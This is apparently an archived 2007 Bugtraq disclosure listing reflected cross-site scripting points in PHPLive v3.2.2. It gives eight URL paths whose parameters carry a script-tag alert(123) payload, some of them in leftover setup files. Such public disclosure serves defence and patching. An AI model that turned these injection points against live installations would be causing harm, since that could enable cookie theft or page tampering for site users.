Bugtraq mailing list archives
bugtraq submission
From: dr.rezen () gmail com
Date: Fri, 01 Jun 2007 12:50:17 -0400
There are numerous XSS vulnerabilities in PHPLive v3.2.2 (Maybe others) /phplive/chat.php?sid=<script>alert(123);</script> /phplive/help.php?LANG[DEFAULT_BRANDING]=<script>alert(123);</script> /phplive/help.php?PHPLIVE_VERSION=<script>alert(123);</script> /phplive/admin/header.php?admin[name]=<script>alert(123);</script> /phplive/super/info.php?BASE_URL=<script>alert(123);</script> And if serveradmin left default setup install files: /phplive/setup/footer.php?LANG[DEFAULT_BRANDING]=<script>alert(123);</script> /phplive/setup/footer.php?PHPLIVE_VERSION=<script>alert(123);</script> /phplive/setup/footer.php?nav_line=<script>alert(123);</script> Bug found by ReZEN! XORCREW! H4X H4X!
Current thread:
- bugtraq submission dr . rezen (Jun 01)
- RE: bugtraq submission Warner Moore (Jun 04)